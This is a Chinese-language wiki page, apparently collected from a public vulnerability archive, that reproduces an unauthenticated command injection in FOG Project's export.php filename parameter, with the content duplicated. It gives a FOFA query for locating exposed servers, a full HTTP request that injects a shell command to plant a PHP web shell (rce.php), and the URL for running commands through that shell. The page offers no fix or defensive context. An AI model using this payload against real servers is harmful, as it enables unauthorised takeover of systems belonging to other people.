fofamini-wiki

登录白背景

源码

FOG Project export存在命令注入漏洞

一、漏洞简介

FOG Project中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响，该漏洞存在于/fog/management/export.php的filename参数，未经身份验证的远程攻击者可利用此漏洞执行任意命令，获取服务器权限。

二、影响版本

FOG Project

三、资产测绘

fofabody="FOG Project"
特征

四、漏洞复现

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+rce.php)&type=pdf HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
fogguiuser=fog&nojson=2

/fog/management/rce.php?cmd=id

原文: https://www.yuque.com/xiaokp7/ocvun2/fmnzgw5h9ltifkxv

# FOG Project export存在命令注入漏洞

# 一、漏洞简介
FOG Project中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响，该漏洞存在于/fog/management/export.php的filename参数，未经身份验证的远程攻击者可利用此漏洞执行任意命令，获取服务器权限。

# 二、影响版本
+ FOG Project

# 三、资产测绘
+ fofa`body="FOG Project"`
+ 特征

![1722450375782-298d1539-7757-46b2-94cc-963c9b176170.png](./img/MByl4laawWQmxXDj/1722450375782-298d1539-7757-46b2-94cc-963c9b176170-493879.png)

# 四、漏洞复现
```java
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+rce.php)&type=pdf HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
fogguiuser=fog&nojson=2
```

![1722450438864-ed2b9dd3-eae1-4d08-9862-f7e0877562cd.png](./img/MByl4laawWQmxXDj/1722450438864-ed2b9dd3-eae1-4d08-9862-f7e0877562cd-032350.png)

```java
/fog/management/rce.php?cmd=id
```

![1722450460743-deb128dd-3b45-47c6-a0cf-728fc332152d.png](./img/MByl4laawWQmxXDj/1722450460743-deb128dd-3b45-47c6-a0cf-728fc332152d-347693.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fmnzgw5h9ltifkxv>